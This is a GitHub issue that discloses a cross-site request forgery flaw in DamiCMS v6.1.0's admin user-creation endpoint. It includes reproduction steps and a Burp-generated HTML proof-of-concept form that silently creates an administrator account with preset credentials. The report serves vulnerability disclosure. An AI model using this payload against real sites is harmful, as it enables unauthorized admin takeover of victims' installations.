Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
There is an Cross-site request forgery vulnerability in your latest version of the CMS v6.1.0 Download link: "https://www.damicms.com/downes/dami.rar" Vulnerability trigger point: http://damicms/admin.php?s=/Admin/doadd 1、Log in as admin
2、Choose this part
3、Capture the package to generate a POC file and run it
4、Refresh page has changed
5.check source code There are some codes check token, but as if not take function
We find the default /Admin/Conf/config.php 'TOKEN_ON' => false, Means not user token, so have the Cross-site request forgery vulnerability
The text was updated successfully, but these errors were encountered:
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/3.cms/damicms/admin.php?s=/Admin/doadd" method="POST"> <input type="hidden" name="username" value="test2" /> <input type="hidden" name="password" value="Abc123456" /> <input type="hidden" name="role_id" value="1" /> <input type="hidden" name="Submit" value="�·»�Š " /> <input type="submit" value="Submit request" /> </form> </body> </html>
Sorry, something went wrong.
No branches or pull requests
There is an Cross-site request forgery vulnerability in your latest version of the CMS v6.1.0
Download link: "https://www.damicms.com/downes/dami.rar"
Vulnerability trigger point:
http://damicms/admin.php?s=/Admin/doadd
1、Log in as admin
2、Choose this part
3、Capture the package to generate a POC file and run it
4、Refresh page has changed
5.check source code
There are some codes check token, but as if not take function
We find the default /Admin/Conf/config.php

'TOKEN_ON' => false,
Means not user token, so have the Cross-site request forgery vulnerability
The text was updated successfully, but these errors were encountered: